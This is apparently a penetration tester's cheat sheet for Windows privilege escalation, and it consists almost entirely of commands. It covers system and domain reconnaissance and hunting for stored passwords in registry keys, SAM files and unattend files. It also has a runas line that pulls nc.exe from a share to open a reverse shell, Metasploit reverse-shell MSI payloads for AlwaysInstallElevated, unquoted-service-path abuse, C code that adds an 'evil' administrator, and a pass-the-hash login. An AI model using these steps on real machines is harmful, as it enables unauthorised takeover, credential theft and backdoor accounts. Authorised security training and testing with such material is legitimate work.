[TOC]
hostname
systeminfo
whoami
If any part of the SYSTEM %PATH% variable is writeable by Authenticated Users, privesc exists
Many applications don't use full path
If system32 is not first entry in path this is bad
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
wmic product get name, version, vendor
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn
whoami
echo %USERNAME%
net user %USERNAME%
List all Local Users
net user
List all Local Groups
net localgroup
Check who is a member of the local group "Administrators"
net localgroup Administrators
Adding users and groups
net user kali kali1234 /add
net localgroup administrators kali /add
net localgroup "Remote Desktop Users" kali /add
Users in a domain
net user /domain
Groups in a domain
net group /domain
net group /domain <Group Name>
wmic useraccount where (name='Guest') get name,sid
netsh firewall show state
netsh firewall show config
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
ipconfig /all
route print
arp -A
netstat -ano
accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
mountvol
mountvol c:\test \\?\Volume{93131ba8-0000-0000-0000-100000000000}\
powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Dis
play Name’, ‘Start Mode’, Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, D riverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
If these are set we could run an msi to elevate privleges
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Insta ller
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
schtasks /query /fo LIST
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v
copy output and save in txt on kali machine
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
dir c:\windows\tasks\
dir c:\windows\system32\tasks\
schtasks /query /v /fo list /tn "\System Maintenance"
https://pentestlab.blog/tag/privilege-escalation/page/3/
If there are entries, it means that we may able to runas certain user who stored his cred in windows
cmdkey /list
runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \\IP\share\nc.exe -nv 10.10.14.2 80 -e cmd.exe"
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
findstr /si password *.xml *.ini *.txt
findstr /si pass/pwd *.ini
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
findstr /spin "password" *.*
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
If 64 bits use: %SystemRoot%\Sysnative\reg.exe
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
Kali VM
1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
7. Copy the generated file, setup.msi, to the Windows VM.
1.Place ‘setup.msi’ in ‘C:\Temp’.
2.Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi
Requires powershell
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr /v /i "Microsoft" | findstr /v /i "windows" | findstr /v /i "vmware"
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Note: On x64 machine you should use bat2exe.bat to create 64 bit executable
1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows VM.
1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
wmic service where caption="Serviio" get name, caption, state, startmode
accesschk.exe -uwcqv * /accepteula
Find Services that can be modified
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Power Users" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\service_exes.txt
echo "" > c:\windows\temp\exe_permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\service_exes.txt) do cmd.exe /c icacls "%a" >> c:\windows\temp\exe_permissions.txt
sc qc \<Service Name>
accesschk.exe -ucqv \<Service Name>
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
Check permissions on file (Look for W or F tag) and substitute if possible
icacls scsiaccess.exe
subinacl /keyreg HKEY_LOCAL_MACHINE/software/microsoft
Write and compile malicious exe file to add a user to the system as an admin
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user evil Ev!lpass /add");
i = system ("net localgroup administrators evil /add");
return 0;
}
sudo i686-w64-mingw32-gcc adduser.c -o adduser.exe
Use the NTLM hash to authenticate
pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2 eb3b9f05c425e //10.11.0.22 cmd